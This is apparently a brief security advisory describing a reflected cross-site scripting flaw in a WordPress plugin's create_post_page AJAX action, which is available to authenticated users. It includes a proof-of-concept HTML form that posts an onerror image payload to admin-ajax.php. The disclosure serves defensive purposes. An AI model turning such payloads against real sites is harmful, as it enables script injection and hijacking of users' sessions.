The create_post_page AJAX action of the plugin (available to authenticated user) does not sanitise or escape user input before outputting it back in the response, leading to a Reflected Cross-Site issue
<form action="https://example.com/wp-admin/admin-ajax.php?action=create_postpage" method="POST">
<input type="text" name="object_type" value='<img src=1 onerror=alert(/xss/)>'>
<input type="submit">
</form>